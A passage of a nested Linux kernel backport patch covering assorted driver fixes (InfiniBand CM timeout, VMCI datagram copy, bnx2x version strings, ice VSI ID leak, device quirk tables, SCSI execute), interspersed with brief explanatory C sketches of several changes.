++	pr_err("%s: cm_id=%p timed out. state=%d refcnt=%d\n", __func__,
++	       cm_id, cm_id->state, refcount_read(&cm_id_priv->refcount));
++}
++
+ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ {
+ 	struct cm_id_private *cm_id_priv;
+ 	struct cm_work *work;
++	int ret;
+ 
+ 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
+ 	spin_lock_irq(&cm_id_priv->lock);
+@@ -1135,7 +1146,14 @@ static void cm_destroy_id(struct ib_cm_id *cm_id, int err)
+ 
+ 	xa_erase(&cm.local_id_table, cm_local_id(cm_id->local_id));
+ 	cm_deref_id(cm_id_priv);
+-	wait_for_completion(&cm_id_priv->comp);
++	do {
++		ret = wait_for_completion_timeout(&cm_id_priv->comp,
++						  msecs_to_jiffies(
++						  CM_DESTROY_ID_WAIT_TIMEOUT));
++		if (!ret) /* timeout happened */
++			cm_destroy_id_wait_timeout(cm_id);
++	} while (!ret);
++
+ 	while ((work = cm_dequeue_work(cm_id_priv)) != NULL)
+ 		cm_free_work(work);
+ 
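Rather than blocking forever on the completion, the cm.c loop above waits in CM_DESTROY_ID_WAIT_TIMEOUT slices and logs the stuck cm_id each time a slice elapses. A hedged sketch of that do/while shape, with a simple countdown standing in for wait_for_completion_timeout():

#include <stdio.h>

/* Stand-in for wait_for_completion_timeout(): returns nonzero once
 * the (simulated) completion fires, zero when the slice times out. */
static int wait_slice(int *remaining_slices)
{
	return --*remaining_slices <= 0;
}

int main(void)
{
	int completion_after = 3;	/* completes on the third slice */
	int ret;

	do {
		ret = wait_slice(&completion_after);
		if (!ret)	/* timeout: diagnose, then keep waiting */
			fprintf(stderr, "destroy still pending, dumping state\n");
	} while (!ret);

	puts("completed");
	return 0;
}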
+diff --git a/drivers/input/rmi4/rmi_driver.c b/drivers/input/rmi4/rmi_driver.c
+index 258d5fe3d395c..aa32371f04af6 100644
+--- a/drivers/input/rmi4/rmi_driver.c
++++ b/drivers/input/rmi4/rmi_driver.c
+@@ -1196,7 +1196,11 @@ static int rmi_driver_probe(struct device *dev)
+ 		}
+ 		rmi_driver_set_input_params(rmi_dev, data->input);
+ 		data->input->phys = devm_kasprintf(dev, GFP_KERNEL,
+-						"%s/input0", dev_name(dev));
++						   "%s/input0", dev_name(dev));
++		if (!data->input->phys) {
++			retval = -ENOMEM;
++			goto err;
++		}
+ 	}
+ 
+ 	retval = rmi_init_functions(data);
+diff --git a/drivers/input/touchscreen/imagis.c b/drivers/input/touchscreen/imagis.c
+index e2697e6c6d2a0..2636e1c9435d8 100644
+--- a/drivers/input/touchscreen/imagis.c
++++ b/drivers/input/touchscreen/imagis.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ 
++#include <linux/bitfield.h>
+ #include <linux/bits.h>
+ #include <linux/delay.h>
+ #include <linux/i2c.h>
+@@ -23,12 +24,9 @@
+ #define IST3038C_I2C_RETRY_COUNT	3
+ #define IST3038C_MAX_FINGER_NUM		10
+ #define IST3038C_X_MASK			GENMASK(23, 12)
+-#define IST3038C_X_SHIFT		12
+ #define IST3038C_Y_MASK			GENMASK(11, 0)
+ #define IST3038C_AREA_MASK		GENMASK(27, 24)
+-#define IST3038C_AREA_SHIFT		24
+ #define IST3038C_FINGER_COUNT_MASK	GENMASK(15, 12)
+-#define IST3038C_FINGER_COUNT_SHIFT	12
+ #define IST3038C_FINGER_STATUS_MASK	GENMASK(9, 0)
+ 
+ struct imagis_ts {
+@@ -92,8 +90,7 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		goto out;
+ 	}
+ 
+-	finger_count = (intr_message & IST3038C_FINGER_COUNT_MASK) >>
+-				IST3038C_FINGER_COUNT_SHIFT;
++	finger_count = FIELD_GET(IST3038C_FINGER_COUNT_MASK, intr_message);
+ 	if (finger_count > IST3038C_MAX_FINGER_NUM) {
+ 		dev_err(&ts->client->dev,
+ 			"finger count %d is more than maximum supported\n",
+@@ -101,7 +98,7 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		goto out;
+ 	}
+ 
+-	finger_pressed = intr_message & IST3038C_FINGER_STATUS_MASK;
++	finger_pressed = FIELD_GET(IST3038C_FINGER_STATUS_MASK, intr_message);
+ 
+ 	for (i = 0; i < finger_count; i++) {
+ 		error = imagis_i2c_read_reg(ts,
+@@ -118,12 +115,11 @@ static irqreturn_t imagis_interrupt(int irq, void *dev_id)
+ 		input_mt_report_slot_state(ts->input_dev, MT_TOOL_FINGER,
+ 					   finger_pressed & BIT(i));
+ 		touchscreen_report_pos(ts->input_dev, &ts->prop,
+-				       (finger_status & IST3038C_X_MASK) >>
+-						IST3038C_X_SHIFT,
+-				       finger_status & IST3038C_Y_MASK, 1);
++				       FIELD_GET(IST3038C_X_MASK, finger_status),
++				       FIELD_GET(IST3038C_Y_MASK, finger_status),
++				       true);
+ 		input_report_abs(ts->input_dev, ABS_MT_TOUCH_MAJOR,
+-				 (finger_status & IST3038C_AREA_MASK) >>
+-					IST3038C_AREA_SHIFT);
++				 FIELD_GET(IST3038C_AREA_MASK, finger_status));
+ 	}
+ 
+ 	input_mt_sync_frame(ts->input_dev);
+@@ -210,7 +206,7 @@ static int imagis_init_input_dev(struct imagis_ts *ts)
+ 
+ 	input_set_capability(input_dev, EV_ABS, ABS_MT_POSITION_X);
+ 	input_set_capability(input_dev, EV_ABS, ABS_MT_POSITION_Y);
+-	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 255, 0, 0);
++	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 16, 0, 0);
+ 
+ 	touchscreen_parse_properties(input_dev, true, &ts->prop);
+ 	if (!ts->prop.max_x || !ts->prop.max_y) {
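FIELD_GET() derives the shift from the mask itself, which is why the paired *_SHIFT constants could be deleted above. A hedged userspace approximation of the macro; the kernel's version in <linux/bitfield.h> adds compile-time checks, while this sketch just uses __builtin_ctz for the shift:

#include <stdint.h>
#include <stdio.h>

/* Simplified FIELD_GET(): the shift is inferred from the mask's
 * lowest set bit, so callers only define the mask. */
#define FIELD_GET(mask, reg) \
	(((reg) & (mask)) >> __builtin_ctz(mask))

#define X_MASK		0x00fff000u	/* GENMASK(23, 12) */
#define Y_MASK		0x00000fffu	/* GENMASK(11, 0)  */
#define AREA_MASK	0x0f000000u	/* GENMASK(27, 24) */

int main(void)
{
	uint32_t finger_status = 0x05abc123;

	printf("x=%u y=%u area=%u\n",
	       FIELD_GET(X_MASK, finger_status),
	       FIELD_GET(Y_MASK, finger_status),
	       FIELD_GET(AREA_MASK, finger_status));
	return 0;
}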
+diff --git a/drivers/media/pci/sta2x11/sta2x11_vip.c b/drivers/media/pci/sta2x11/sta2x11_vip.c
+index 8535e49a4c4f9..1f7ab56de4a00 100644
+--- a/drivers/media/pci/sta2x11/sta2x11_vip.c
++++ b/drivers/media/pci/sta2x11/sta2x11_vip.c
+@@ -756,7 +756,7 @@ static const struct video_device video_dev_template = {
+ /**
+  * vip_irq - interrupt routine
+  * @irq: Number of interrupt ( not used, correct number is assumed )
+- * @vip: local data structure containing all information
++ * @data: local data structure containing all information
+  *
+  * check for both frame interrupts set ( top and bottom ).
+  * check FIFO overflow, but limit number of log messages after open.
+@@ -766,8 +766,9 @@ static const struct video_device video_dev_template = {
+  *
+  * IRQ_HANDLED, interrupt done.
+  */
+-static irqreturn_t vip_irq(int irq, struct sta2x11_vip *vip)
++static irqreturn_t vip_irq(int irq, void *data)
+ {
++	struct sta2x11_vip *vip = data;
+ 	unsigned int status;
+ 
+ 	status = reg_read(vip, DVP_ITS);
+@@ -1049,9 +1050,7 @@ static int sta2x11_vip_init_one(struct pci_dev *pdev,
+ 
+ 	spin_lock_init(&vip->slock);
+ 
+-	ret = request_irq(pdev->irq,
+-			  (irq_handler_t) vip_irq,
+-			  IRQF_SHARED, KBUILD_MODNAME, vip);
++	ret = request_irq(pdev->irq, vip_irq, IRQF_SHARED, KBUILD_MODNAME, vip);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "request_irq failed\n");
+ 		ret = -ENODEV;
+diff --git a/drivers/misc/vmw_vmci/vmci_datagram.c b/drivers/misc/vmw_vmci/vmci_datagram.c
+index f50d22882476f..a0ad1f3a69f7e 100644
+--- a/drivers/misc/vmw_vmci/vmci_datagram.c
++++ b/drivers/misc/vmw_vmci/vmci_datagram.c
+@@ -234,7 +234,8 @@ static int dg_dispatch_as_host(u32 context_id, struct vmci_datagram *dg)
+ 
+ 			dg_info->in_dg_host_queue = true;
+ 			dg_info->entry = dst_entry;
+-			memcpy(&dg_info->msg, dg, dg_size);
++			dg_info->msg = *dg;
++			memcpy(&dg_info->msg_payload, dg + 1, dg->payload_size);
+ 
+ 			INIT_WORK(&dg_info->work, dg_delayed_dispatch);
+ 			schedule_work(&dg_info->work);
+@@ -377,7 +378,8 @@ int vmci_datagram_invoke_guest_handler(struct vmci_datagram *dg)
+ 
+ 		dg_info->in_dg_host_queue = false;
+ 		dg_info->entry = dst_entry;
+-		memcpy(&dg_info->msg, dg, VMCI_DG_SIZE(dg));
++		dg_info->msg = *dg;
++		memcpy(&dg_info->msg_payload, dg + 1, dg->payload_size);
+ 
+ 		INIT_WORK(&dg_info->work, dg_delayed_dispatch);
+ 		schedule_work(&dg_info->work);
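Copying the fixed header with a struct assignment and the payload into its own field avoids one memcpy of header-plus-payload into a member sized only for the header. A hedged sketch of that split, with the payload living directly after the header in memory:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct datagram {
	uint64_t payload_size;
	/* payload bytes follow the header in memory */
};

struct dg_info {
	struct datagram msg;		/* header only */
	unsigned char msg_payload[64];	/* payload goes here, not in msg */
};

static void enqueue(struct dg_info *info, const struct datagram *dg)
{
	/* Struct assignment copies exactly the header... */
	info->msg = *dg;
	/* ...and the payload lands in the field sized for it. */
	memcpy(info->msg_payload, dg + 1, dg->payload_size);
}

int main(void)
{
	_Alignas(struct datagram)
	unsigned char buf[sizeof(struct datagram) + 8];
	struct datagram *dg = (struct datagram *)buf;
	struct dg_info info;

	dg->payload_size = 8;
	memcpy(dg + 1, "payload", 8);	/* 7 chars + NUL */

	enqueue(&info, dg);
	printf("%s\n", info.msg_payload);
	return 0;
}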
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+index 4950fde82d175..b04c5b51eb598 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+@@ -147,10 +147,11 @@ void bnx2x_fill_fw_str(struct bnx2x *bp, char *buf, size_t buf_len)
+ 
+ 		phy_fw_ver[0] = '\0';
+ 		bnx2x_get_ext_phy_fw_version(&bp->link_params,
+-					     phy_fw_ver, PHY_FW_VER_LEN);
+-		strscpy(buf, bp->fw_ver, buf_len);
+-		snprintf(buf + strlen(bp->fw_ver), 32 - strlen(bp->fw_ver),
+-			 "bc %d.%d.%d%s%s",
++					     phy_fw_ver, sizeof(phy_fw_ver));
++		/* This may become truncated. */
++		scnprintf(buf, buf_len,
++			 "%sbc %d.%d.%d%s%s",
++			 bp->fw_ver,
+ 			 (bp->common.bc_ver & 0xff0000) >> 16,
+ 			 (bp->common.bc_ver & 0xff00) >> 8,
+ 			 (bp->common.bc_ver & 0xff),
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+index bda3ccc28eca6..f920976c36f0c 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+@@ -1132,7 +1132,7 @@ static void bnx2x_get_drvinfo(struct net_device *dev,
+ 	}
+ 
+ 	memset(version, 0, sizeof(version));
+-	bnx2x_fill_fw_str(bp, version, ETHTOOL_FWVERS_LEN);
++	bnx2x_fill_fw_str(bp, version, sizeof(version));
+ 	strlcat(info->fw_version, version, sizeof(info->fw_version));
+ 
+ 	strscpy(info->bus_info, pci_name(bp->pdev), sizeof(info->bus_info));
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+index 02808513ffe45..ea310057fe3af 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c
+@@ -6163,8 +6163,8 @@ static void bnx2x_link_int_ack(struct link_params *params,
+ 
+ static int bnx2x_null_format_ver(u32 spirom_ver, u8 *str, u16 *len)
+ {
+-	str[0] = '\0';
+-	(*len)--;
++	if (*len)
++		str[0] = '\0';
+ 	return 0;
+ }
+ 
+@@ -6173,7 +6173,7 @@ static int bnx2x_format_ver(u32 num, u8 *str, u16 *len)
+ 	u16 ret;
+ 
+ 	if (*len < 10) {
+-		/* Need more than 10chars for this format */
++		/* Need more than 10 chars for this format */
+ 		bnx2x_null_format_ver(num, str, len);
+ 		return -EINVAL;
+ 	}
+@@ -6188,8 +6188,8 @@ static int bnx2x_3_seq_format_ver(u32 num, u8 *str, u16 *len)
+ {
+ 	u16 ret;
+ 
+-	if (*len < 10) {
+-		/* Need more than 10chars for this format */
++	if (*len < 9) {
++		/* Need more than 9 chars for this format */
+ 		bnx2x_null_format_ver(num, str, len);
+ 		return -EINVAL;
+ 	}
+@@ -6208,7 +6208,7 @@ int bnx2x_get_ext_phy_fw_version(struct link_params *params, u8 *version,
+ 	int status = 0;
+ 	u8 *ver_p = version;
+ 	u16 remain_len = len;
+-	if (version == NULL || params == NULL)
++	if (version == NULL || params == NULL || len == 0)
+ 		return -EINVAL;
+ 	bp = params->bp;
+ 
+@@ -11546,7 +11546,7 @@ static int bnx2x_7101_format_ver(u32 spirom_ver, u8 *str, u16 *len)
+ 	str[2] = (spirom_ver & 0xFF0000) >> 16;
+ 	str[3] = (spirom_ver & 0xFF000000) >> 24;
+ 	str[4] = '\0';
+-	*len -= 5;
++	*len -= 4;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 4b71392f60df1..e64bef490a174 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -493,7 +493,7 @@ static int ice_vc_get_vf_res_msg(struct ice_vf *vf, u8 *msg)
+ 	vfres->rss_lut_size = ICE_VSIQF_HLUT_ARRAY_SIZE;
+ 	vfres->max_mtu = ice_vc_get_max_frame_size(vf);
+ 
+-	vfres->vsi_res[0].vsi_id = vf->lan_vsi_num;
++	vfres->vsi_res[0].vsi_id = ICE_VF_VSI_ID;
+ 	vfres->vsi_res[0].vsi_type = VIRTCHNL_VSI_SRIOV;
+ 	vfres->vsi_res[0].num_queue_pairs = vsi->num_txq;
+ 	ether_addr_copy(vfres->vsi_res[0].default_mac_addr,
+@@ -539,12 +539,7 @@ static void ice_vc_reset_vf_msg(struct ice_vf *vf)
+  */
+ bool ice_vc_isvalid_vsi_id(struct ice_vf *vf, u16 vsi_id)
+ {
+-	struct ice_pf *pf = vf->pf;
+-	struct ice_vsi *vsi;
+-
+-	vsi = ice_find_vsi(pf, vsi_id);
+-
+-	return (vsi && (vsi->vf == vf));
++	return vsi_id == ICE_VF_VSI_ID;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.h b/drivers/net/ethernet/intel/ice/ice_virtchnl.h
+index b5a3fd8adbb4e..6073d3b2d2d65 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.h
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.h
+@@ -18,6 +18,15 @@
+  */
+ #define ICE_MAX_MACADDR_PER_VF		18
+ 
++/* VFs only get a single VSI. For ice hardware, the VF does not need to know
++ * its VSI index. However, the virtchnl interface requires a VSI number,
++ * mainly due to legacy hardware.
++ *
++ * Since the VF doesn't need this information, report a static value to the VF
++ * instead of leaking any information about the PF or hardware setup.
++ */
++#define ICE_VF_VSI_ID	1
++
+ struct ice_virtchnl_ops {
+ 	int (*get_ver_msg)(struct ice_vf *vf, u8 *msg);
+ 	int (*get_vf_res_msg)(struct ice_vf *vf, u8 *msg);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index fcc3faecb0600..d33cf8ee7c336 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -3216,9 +3216,12 @@ static int ionic_lif_adminq_init(struct ionic_lif *lif)
+ 
+ 	napi_enable(&qcq->napi);
+ 
+-	if (qcq->flags & IONIC_QCQ_F_INTR)
++	if (qcq->flags & IONIC_QCQ_F_INTR) {
++		irq_set_affinity_hint(qcq->intr.vector,
++				      &qcq->intr.affinity_mask);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+ 				IONIC_INTR_MASK_CLEAR);
++	}
+ 
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index 3f882bce37f42..d126273daab4f 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -262,7 +262,7 @@ static int xpcs_soft_reset(struct dw_xpcs *xpcs,
+ 		dev = MDIO_MMD_VEND2;
+ 		break;
+ 	default:
+-		return -1;
++		return -EINVAL;
+ 	}
+ 
+ 	ret = xpcs_write(xpcs, dev, MDIO_CTRL1, MDIO_CTRL1_RESET);
+@@ -904,7 +904,7 @@ int xpcs_do_config(struct dw_xpcs *xpcs, phy_interface_t interface,
+ 			return ret;
+ 		break;
+ 	default:
+-		return -1;
++		return -EINVAL;
+ 	}
+ 
+ 	if (compat->pma_config) {
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index a62ee05c54097..4bea36cc71085 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -105,7 +105,7 @@ static struct mhi_controller_config ath11k_mhi_config_qca6390 = {
+ 	.max_channels = 128,
+ 	.timeout_ms = 2000,
+ 	.use_bounce_buf = false,
+-	.buf_len = 0,
++	.buf_len = 8192,
+ 	.num_channels = ARRAY_SIZE(ath11k_mhi_channels_qca6390),
+ 	.ch_cfg = ath11k_mhi_channels_qca6390,
+ 	.num_events = ARRAY_SIZE(ath11k_mhi_events_qca6390),
+diff --git a/drivers/net/wireless/ath/ath9k/antenna.c b/drivers/net/wireless/ath/ath9k/antenna.c
+index 988222cea9dfe..acc84e6711b0e 100644
+--- a/drivers/net/wireless/ath/ath9k/antenna.c
++++ b/drivers/net/wireless/ath/ath9k/antenna.c
+@@ -643,7 +643,7 @@ static void ath_ant_try_scan(struct ath_ant_comb *antcomb,
+ 				conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1;
+ 				conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2;
+ 			} else if (antcomb->rssi_sub >
+-				   antcomb->rssi_lna1) {
++				   antcomb->rssi_lna2) {
+ 				/* set to A-B */
+ 				conf->main_lna_conf = ATH_ANT_DIV_COMB_LNA1;
+ 				conf->alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
+index 86ff174936a9a..c3a602197662b 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/dmi.c
+@@ -82,6 +82,15 @@ static const struct dmi_system_id dmi_platform_data[] = {
+ 		},
+ 		.driver_data = (void *)&acepc_t8_data,
+ 	},
++	{
++		/* ACEPC W5 Pro Cherry Trail Z8350 HDMI stick, same wifi as the T8 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "T3 MRD"),
++			DMI_MATCH(DMI_CHASSIS_TYPE, "3"),
++			DMI_MATCH(DMI_BIOS_VENDOR, "American Megatrends Inc."),
++		},
++		.driver_data = (void *)&acepc_t8_data,
++	},
+ 	{
+ 		/* Chuwi Hi8 Pro with D2D3_Hi8Pro.233 BIOS */
+ 		.matches = {
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 4d4db5f6836be..7f30e6add9933 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -505,6 +505,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 
+ /* Bz devices */
+ 	{IWL_PCI_DEVICE(0x2727, PCI_ANY_ID, iwl_bz_trans_cfg)},
++	{IWL_PCI_DEVICE(0x272D, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x272b, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0xA840, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7740, PCI_ANY_ID, iwl_bz_trans_cfg)},
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.h b/drivers/net/wireless/realtek/rtw89/pci.h
+index 179740607778a..d982c5dc0889f 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.h
++++ b/drivers/net/wireless/realtek/rtw89/pci.h
+@@ -546,7 +546,7 @@
+ #define RTW89_PCI_TXWD_NUM_MAX		512
+ #define RTW89_PCI_TXWD_PAGE_SIZE	128
+ #define RTW89_PCI_ADDRINFO_MAX		4
+-#define RTW89_PCI_RX_BUF_SIZE		11460
++#define RTW89_PCI_RX_BUF_SIZE		(11454 + 40) /* +40 for rtw89_rxdesc_long_v2 */
+ 
+ #define RTW89_PCI_POLL_BDRAM_RST_CNT	100
+ #define RTW89_PCI_MULTITAG		8
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 3d01290994d89..5ff09f2cacab7 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3471,6 +3471,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_VDEVICE(REDHAT, 0x0010),	/* Qemu emulated controller */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x126f, 0x2262),	/* Silicon Motion generic */
++		.driver_data = NVME_QUIRK_NO_DEEPEST_PS |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x126f, 0x2263),	/* Silicon Motion unidentified */
+ 		.driver_data = NVME_QUIRK_NO_NS_DESC_LIST |
+ 				NVME_QUIRK_BOGUS_NID, },
+diff --git a/drivers/pinctrl/renesas/core.c b/drivers/pinctrl/renesas/core.c
+index c91102d3f1d15..1c7f8caf7f7cd 100644
+--- a/drivers/pinctrl/renesas/core.c
++++ b/drivers/pinctrl/renesas/core.c
+@@ -921,9 +921,11 @@ static void __init sh_pfc_check_cfg_reg(const char *drvname,
+ 		sh_pfc_err("reg 0x%x: var_field_width declares %u instead of %u bits\n",
+ 			   cfg_reg->reg, rw, cfg_reg->reg_width);
+ 
+-	if (n != cfg_reg->nr_enum_ids)
++	if (n != cfg_reg->nr_enum_ids) {
+ 		sh_pfc_err("reg 0x%x: enum_ids[] has %u instead of %u values\n",
+ 			   cfg_reg->reg, cfg_reg->nr_enum_ids, n);
++		n = cfg_reg->nr_enum_ids;
++	}
+ 
+ check_enum_ids:
+ 	sh_pfc_check_reg_enums(drvname, cfg_reg->reg, cfg_reg->enum_ids, n);
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index c10c99a31a90a..224139006a433 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -136,8 +136,6 @@ static int intel_vbtn_input_setup(struct platform_device *device)
+ 	priv->switches_dev->id.bustype = BUS_HOST;
+ 
+ 	if (priv->has_switches) {
+-		detect_tablet_mode(&device->dev);
+-
+ 		ret = input_register_device(priv->switches_dev);
+ 		if (ret)
+ 			return ret;
+@@ -316,6 +314,9 @@ static int intel_vbtn_probe(struct platform_device *device)
+ 		if (ACPI_FAILURE(status))
+ 			dev_err(&device->dev, "Error VBDL failed with ACPI status %d\n", status);
+ 	}
++	// Check switches after buttons since VBDL may have side effects.
++	if (has_switches)
++		detect_tablet_mode(&device->dev);
+ 
+ 	device_init_wakeup(&device->dev, true);
+ 	/*
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 11d72a3533552..399b97b54dd0f 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -1177,6 +1177,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI.D86JLBNR"),
+ 		},
+ 	},
++	{
++		/* Chuwi Vi8 dual-boot (CWI506) */
++		.driver_data = (void *)&chuwi_vi8_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "i86"),
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI2.D86JHBNR02"),
++		},
++	},
+ 	{
+ 		/* Chuwi Vi8 Plus (CWI519) */
+ 		.driver_data = (void *)&chuwi_vi8_plus_data,
+diff --git a/drivers/scsi/lpfc/lpfc_nportdisc.c b/drivers/scsi/lpfc/lpfc_nportdisc.c
+index b86ff9fcdf0c6..f21396a0ba9d0 100644
+--- a/drivers/scsi/lpfc/lpfc_nportdisc.c
++++ b/drivers/scsi/lpfc/lpfc_nportdisc.c
+@@ -748,8 +748,10 @@ lpfc_rcv_padisc(struct lpfc_vport *vport, struct lpfc_nodelist *ndlp,
+ 				/* Save the ELS cmd */
+ 				elsiocb->drvrTimeout = cmd;
+ 
+-				lpfc_sli4_resume_rpi(ndlp,
+-					lpfc_mbx_cmpl_resume_rpi, elsiocb);
++				if (lpfc_sli4_resume_rpi(ndlp,
++						lpfc_mbx_cmpl_resume_rpi,
++						elsiocb))
++					kfree(elsiocb);
+ 				goto out;
+ 			}
+ 		}
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index edd296f950a33..5c5954b78585e 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -185,37 +185,39 @@ void scsi_queue_insert(struct scsi_cmnd *cmd, int reason)
+ 	__scsi_queue_insert(cmd, reason, true);
+ }
+ 
++
+ /**
+- * scsi_execute_cmd - insert request and wait for the result
+- * @sdev:	scsi_device
++ * __scsi_execute - insert request and wait for the result
++ * @sdev:	scsi device
+  * @cmd:	scsi command
+- * @opf:	block layer request cmd_flags
++ * @data_direction: data direction
+  * @buffer:	data buffer
+  * @bufflen:	len of buffer
++ * @sense:	optional sense buffer
++ * @sshdr:	optional decoded sense header
+  * @timeout:	request timeout in HZ
+  * @retries:	number of times to retry request
+- * @args:	Optional args. See struct definition for field descriptions
++ * @flags:	flags for ->cmd_flags
++ * @rq_flags:	flags for ->rq_flags
++ * @resid:	optional residual length
+  *
+  * Returns the scsi_cmnd result field if a command was executed, or a negative
+  * Linux error code if we didn't get that far.
+  */
+-int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+-		     blk_opf_t opf, void *buffer, unsigned int bufflen,
+-		     int timeout, int retries,
+-		     const struct scsi_exec_args *args)
++int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
++		 int data_direction, void *buffer, unsigned bufflen,
++		 unsigned char *sense, struct scsi_sense_hdr *sshdr,
++		 int timeout, int retries, blk_opf_t flags,
++		 req_flags_t rq_flags, int *resid)
+ {
+-	static const struct scsi_exec_args default_args;
+ 	struct request *req;
+ 	struct scsi_cmnd *scmd;
+ 	int ret;
+ 
+-	if (!args)
+-		args = &default_args;
+-	else if (WARN_ON_ONCE(args->sense &&
+-			      args->sense_len != SCSI_SENSE_BUFFERSIZE))
+-		return -EINVAL;
+-
+-	req = scsi_alloc_request(sdev->request_queue, opf, args->req_flags);
++	req = scsi_alloc_request(sdev->request_queue,
++			data_direction == DMA_TO_DEVICE ?
++			REQ_OP_DRV_OUT : REQ_OP_DRV_IN,
++			rq_flags & RQF_PM ? BLK_MQ_REQ_PM : 0);
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 
+@@ -230,7 +232,8 @@ int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+ 	memcpy(scmd->cmnd, cmd, scmd->cmd_len);
+ 	scmd->allowed = retries;
+ 	req->timeout = timeout;
+-	req->rq_flags |= RQF_QUIET;
++	req->cmd_flags |= flags;
++	req->rq_flags |= rq_flags | RQF_QUIET;
+ 
+ 	/*
+ 	 * head injection *required* here otherwise quiesce won't work
+@@ -246,21 +249,20 @@ int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+ 	if (unlikely(scmd->resid_len > 0 && scmd->resid_len <= bufflen))
+ 		memset(buffer + bufflen - scmd->resid_len, 0, scmd->resid_len);
+ 
+-	if (args->resid)
